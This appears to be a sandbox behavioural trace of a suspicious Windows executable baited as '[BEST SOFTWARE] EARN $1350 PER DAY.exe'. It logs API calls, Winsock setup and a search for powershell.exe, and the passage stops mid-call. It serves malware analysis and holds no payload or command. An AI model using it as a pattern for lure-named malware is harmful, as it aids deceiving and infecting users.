# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 28.04.2020 10:39:11.096 Process: id = "1" image_name = "[best software] earn $1350 per day.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\[best software] earn $1350 per day.exe" page_root = "0x4447f000" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\[BEST SOFTWARE] EARN $1350 PER DAY.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xab0 [0041.082] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77940000 [0041.083] GetProcAddress (hModule=0x77940000, lpProcName="AddDllDirectory") returned 0x0 [0041.084] GetProcAddress (hModule=0x77940000, lpProcName="AddVectoredContinueHandler") returned 0x77b43ae0 [0041.084] GetProcAddress (hModule=0x77940000, lpProcName="GetQueuedCompletionStatusEx") returned 0x7798c050 [0041.084] GetProcAddress (hModule=0x77940000, lpProcName="LoadLibraryExA") returned 0x7794e3b0 [0041.084] GetProcAddress (hModule=0x77940000, lpProcName="LoadLibraryExW") returned 0x77956640 [0041.084] GetSystemDirectoryA (in: lpBuffer=0x6f7160, uSize=0x208 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.084] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff550000 [0044.910] GetProcAddress (hModule=0x7feff550000, lpProcName="SystemFunction036") returned 0x7feff551044 [0044.910] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\ntdll.dll") returned 0x77a60000 [0044.910] GetProcAddress (hModule=0x77a60000, lpProcName="NtWaitForSingleObject") returned 0x77ab1350 [0044.910] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\winmm.dll") returned 0x7fef8470000 [0049.220] GetProcAddress (hModule=0x7fef8470000, lpProcName="timeBeginPeriod") returned 0x7fef847a648 [0049.220] GetProcAddress (hModule=0x7fef8470000, lpProcName="timeEndPeriod") returned 0x7fef847a768 [0049.220] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\ws2_32.dll") returned 0x7fefdd80000 [0049.875] GetProcAddress (hModule=0x7fefdd80000, lpProcName="WSAGetOverlappedResult") returned 0x7fefdda7a50 [0049.876] GetProcAddress (hModule=0x77a60000, lpProcName="wine_get_version") returned 0x0 [0049.876] SetErrorMode (uMode=0x2) returned 0x0 [0049.876] SetErrorMode (uMode=0x8003) returned 0x2 [0049.876] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4623a0) returned 0x8881e0 [0049.876] RtlAddVectoredContinueHandler (First=0x1, Handler=0x4623b0) returned 0x888210 [0049.876] RtlAddVectoredContinueHandler (First=0x0, Handler=0x4623c0) returned 0x888240 [0049.876] SetConsoleCtrlHandler (HandlerRoutine=0x4623d0, Add=1) returned 1 [0049.877] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0049.883] GetProcessAffinityMask (in: hProcess=0xffffffffffffffff, lpProcessAffinityMask=0x22fe88, lpSystemAffinityMask=0x22fe80 | out: lpProcessAffinityMask=0x22fe88, lpSystemAffinityMask=0x22fe80) returned 1 [0049.883] GetSystemInfo (in: lpSystemInfo=0x22fef0 | out: lpSystemInfo=0x22fef0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0049.884] SetProcessPriorityBoost (hProcess=0xffffffffffffffff, bDisablePriorityBoost=1) returned 1 [0049.885] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x3c0000 [0049.885] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x700000 [0049.885] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x2090000 [0049.886] VirtualAlloc (lpAddress=0x0, dwSize=0x800000, flAllocationType=0x2000, flProtect=0x4) returned 0x2190000 [0049.886] VirtualAlloc (lpAddress=0x0, dwSize=0x4000000, flAllocationType=0x2000, flProtect=0x4) returned 0x2990000 [0049.888] VirtualAlloc (lpAddress=0x0, dwSize=0x20000000, flAllocationType=0x2000, flProtect=0x4) returned 0x6990000 [0049.909] SystemFunction036 (in: RandomBuffer=0x6f6890, RandomBufferLength=0x8 | out: RandomBuffer=0x6f6890) returned 1 [0050.121] VirtualAlloc (lpAddress=0xc000000000, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0xc000000000 [0050.122] VirtualAlloc (lpAddress=0x0, dwSize=0x800000, flAllocationType=0x3000, flProtect=0x4) returned 0x26990000 [0050.123] VirtualAlloc (lpAddress=0x0, dwSize=0x21088, flAllocationType=0x3000, flProtect=0x4) returned 0x7b0000 [0050.123] VirtualAlloc (lpAddress=0x700000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x700000 [0050.123] VirtualAlloc (lpAddress=0x2110000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2110000 [0050.124] VirtualAlloc (lpAddress=0x2596000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2596000 [0050.124] VirtualAlloc (lpAddress=0x49c0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x49c0000 [0050.124] VirtualAlloc (lpAddress=0x16b10000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x16b10000 [0050.125] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x3000, flProtect=0x4) returned 0x27190000 [0050.128] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x720000 [0050.128] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x3000, flProtect=0x4) returned 0x7e0000 [0050.129] VirtualAlloc (lpAddress=0xc000000000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000000000 [0050.129] VirtualAlloc (lpAddress=0xc000002000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000002000 [0050.130] SystemFunction036 (in: RandomBuffer=0x6f6c60, RandomBufferLength=0x80 | out: RandomBuffer=0x6f6c60) returned 1 [0050.130] VirtualAlloc (lpAddress=0xc000004000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000004000 [0050.130] VirtualAlloc (lpAddress=0xc000006000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000006000 [0050.131] GetEnvironmentStringsW () returned 0x88e1a0* [0050.132] VirtualAlloc (lpAddress=0xc000008000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000008000 [0050.132] VirtualAlloc (lpAddress=0xc00000a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000a000 [0050.132] VirtualAlloc (lpAddress=0xc00000c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000c000 [0050.132] VirtualAlloc (lpAddress=0xc00000e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00000e000 [0050.133] VirtualAlloc (lpAddress=0xc000010000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000010000 [0050.133] VirtualAlloc (lpAddress=0xc000012000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000012000 [0050.133] VirtualAlloc (lpAddress=0xc000014000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000014000 [0050.133] FreeEnvironmentStringsW (penv=0x88e1a0) returned 1 [0050.133] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\powrprof.dll") returned 0x7fefb830000 [0056.982] GetProcAddress (hModule=0x7fefb830000, lpProcName="PowerRegisterSuspendResumeNotification") returned 0x0 [0056.984] VirtualAlloc (lpAddress=0xc000016000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000016000 [0056.985] VirtualAlloc (lpAddress=0xc000020000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000020000 [0056.985] VirtualAlloc (lpAddress=0xc000022000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000022000 [0056.986] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x22fe78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x22fe78*=0x80) returned 1 [0056.986] VirtualQuery (in: lpAddress=0x22fe98, lpBuffer=0x22fe98, dwLength=0x30 | out: lpBuffer=0x22fe98*(BaseAddress=0x22f000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.986] VirtualAlloc (lpAddress=0xc00002a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002a000 [0056.986] VirtualAlloc (lpAddress=0xc00002c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002c000 [0056.986] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002a380, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x84 [0056.988] CloseHandle (hObject=0x84) returned 1 [0056.988] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002a700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x84 [0056.990] CloseHandle (hObject=0x84) returned 1 [0056.990] VirtualAlloc (lpAddress=0xc00002e000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00002e000 [0056.990] VirtualAlloc (lpAddress=0xc000036000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000036000 [0056.991] VirtualAlloc (lpAddress=0xc000038000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000038000 [0056.991] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002aa80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x84 [0056.995] CloseHandle (hObject=0x84) returned 1 [0056.995] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x84 [0056.995] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x94 [0056.995] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0056.997] VirtualAlloc (lpAddress=0xc000086000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000086000 [0056.998] VirtualAlloc (lpAddress=0xc000088000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000088000 [0056.998] VirtualAlloc (lpAddress=0xc00008a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008a000 [0056.999] VirtualAlloc (lpAddress=0xc00008c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008c000 [0056.999] VirtualAlloc (lpAddress=0xc00008e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00008e000 [0056.999] VirtualAlloc (lpAddress=0xc000090000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000090000 [0056.999] VirtualAlloc (lpAddress=0xc000094000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000094000 [0057.000] VirtualAlloc (lpAddress=0xc000096000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000096000 [0057.000] VirtualAlloc (lpAddress=0xc000098000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000098000 [0057.001] VirtualAlloc (lpAddress=0xc00009a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009a000 [0057.001] VirtualAlloc (lpAddress=0xc00009c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009c000 [0057.002] VirtualAlloc (lpAddress=0xc00009e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00009e000 [0057.002] VirtualAlloc (lpAddress=0xc0000a0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a0000 [0057.003] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0057.003] VirtualAlloc (lpAddress=0xc0000a2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a2000 [0057.003] GetProcAddress (hModule=0x77940000, lpProcName="GetStdHandle") returned 0x7795d750 [0057.003] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0057.003] GetProcAddress (hModule=0x77940000, lpProcName="SetHandleInformation") returned 0x77945bb0 [0057.004] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0057.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0057.004] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0057.004] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0057.004] SetHandleInformation (hObject=0x0, dwMask=0x1, dwFlags=0x0) returned 0 [0057.004] VirtualAlloc (lpAddress=0xc0000a4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a4000 [0057.004] GetProcAddress (hModule=0x77940000, lpProcName="GetSystemDirectoryW") returned 0x77957120 [0057.004] GetSystemDirectoryW (in: lpBuffer=0xc0000a4000, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0057.004] VirtualAlloc (lpAddress=0xc0000a6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a6000 [0057.005] VirtualAlloc (lpAddress=0xc0000a8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000a8000 [0057.005] VirtualAlloc (lpAddress=0xc0000aa000, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000aa000 [0057.006] VirtualAlloc (lpAddress=0xc0000b8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000b8000 [0057.006] VirtualAlloc (lpAddress=0xc0000ba000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ba000 [0057.006] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\ws2_32.dll") returned 0x7fefdd80000 [0057.007] GetProcAddress (hModule=0x7fefdd80000, lpProcName="WSAStartup") returned 0x7fefdd84980 [0057.007] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xc000027d20 | out: lpWSAData=0xc000027d20) returned 0 [0057.019] GetProcAddress (hModule=0x77940000, lpProcName="CancelIoEx") returned 0x7798c5c0 [0057.019] VirtualAlloc (lpAddress=0xc0000bc000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000bc000 [0057.020] VirtualAlloc (lpAddress=0xc0000c4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000c4000 [0057.021] GetProcAddress (hModule=0x77940000, lpProcName="SetFileCompletionNotificationModes") returned 0x77990550 [0057.021] GetProcAddress (hModule=0x7fefdd80000, lpProcName="WSAEnumProtocolsW") returned 0x7fefdda8af0 [0057.021] WSAEnumProtocolsW (in: lpiProtocols=0xc0000c6e68, lpProtocolBuffer=0xc0000c6e70, lpdwBufferLength=0xc0000c6e64 | out: lpProtocolBuffer=0xc0000c6e70, lpdwBufferLength=0xc0000c6e64) returned 4 [0057.027] GetProcAddress (hModule=0x77940000, lpProcName="GetConsoleMode") returned 0x77962e60 [0057.027] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc0000cbe6c | out: lpMode=0xc0000cbe6c) returned 0 [0057.027] GetProcAddress (hModule=0x77940000, lpProcName="GetFileType") returned 0x77962e00 [0057.027] GetFileType (hFile=0x0) returned 0x0 [0057.027] VirtualAlloc (lpAddress=0xc0000cc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000cc000 [0057.028] VirtualAlloc (lpAddress=0xc0000ce000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ce000 [0057.028] SetEvent (hEvent=0xac) returned 1 [0057.028] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc0000cbe6c | out: lpMode=0xc0000cbe6c) returned 0 [0057.028] GetFileType (hFile=0x0) returned 0x0 [0057.028] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0xc0000cbe6c | out: lpMode=0xc0000cbe6c) returned 0 [0057.028] GetFileType (hFile=0x0) returned 0x0 [0057.028] GetProcAddress (hModule=0x77940000, lpProcName="GetCommandLineW") returned 0x7795c480 [0057.028] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\[BEST SOFTWARE] EARN $1350 PER DAY.exe\" " [0057.028] VirtualAlloc (lpAddress=0xc0000d0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d0000 [0057.029] VirtualAlloc (lpAddress=0xc0000d2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d2000 [0057.029] VirtualAlloc (lpAddress=0xc0000d4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d4000 [0057.030] VirtualAlloc (lpAddress=0xc0000d8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d8000 [0057.030] VirtualAlloc (lpAddress=0xc0000da000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000da000 [0057.031] VirtualAlloc (lpAddress=0xc0000dc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000dc000 [0057.031] VirtualAlloc (lpAddress=0xc0000de000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000de000 [0057.031] GetProcAddress (hModule=0x77940000, lpProcName="GetEnvironmentVariableW") returned 0x779590a0 [0057.032] GetEnvironmentVariableW (in: lpName="GODEBUG", lpBuffer=0xc0000de000, nSize=0x64 | out: lpBuffer="") returned 0x0 [0057.032] VirtualAlloc (lpAddress=0xc0000e0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e0000 [0057.032] VirtualAlloc (lpAddress=0xc0000e2000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e2000 [0057.033] VirtualAlloc (lpAddress=0xc0000e6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e6000 [0057.033] VirtualAlloc (lpAddress=0xc0000e8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e8000 [0057.034] VirtualAlloc (lpAddress=0xc0000ea000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ea000 [0057.037] VirtualAlloc (lpAddress=0xc0000ec000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ec000 [0057.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc0000de0d0, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0057.037] VirtualAlloc (lpAddress=0xc0000ee000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000ee000 [0057.037] VirtualAlloc (lpAddress=0xc0000f0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f0000 [0057.037] VirtualAlloc (lpAddress=0xc0000f2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f2000 [0057.038] VirtualAlloc (lpAddress=0xc0000f4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000f4000 [0057.038] GetProcAddress (hModule=0x77940000, lpProcName="GetFileAttributesExW") returned 0x7794b7a0 [0057.038] GetFileAttributesExW (in: lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.039] GetProcAddress (hModule=0x77940000, lpProcName="CreateFileW") returned 0x77951870 [0057.039] CreateFileW (lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.039] GetFileAttributesExW (in: lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.039] CreateFileW (lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.039] GetFileAttributesExW (in: lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.039] CreateFileW (lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.039] GetFileAttributesExW (in: lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.039] CreateFileW (lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.040] GetFileAttributesExW (in: lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.040] CreateFileW (lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.040] GetFileAttributesExW (in: lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.040] CreateFileW (lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.040] GetFileAttributesExW (in: lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.040] CreateFileW (lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.040] GetFileAttributesExW (in: lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.040] CreateFileW (lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0057.040] GetFileAttributesExW (in: lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb4e8 | out: lpFileInformation=0xc0000cb4e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 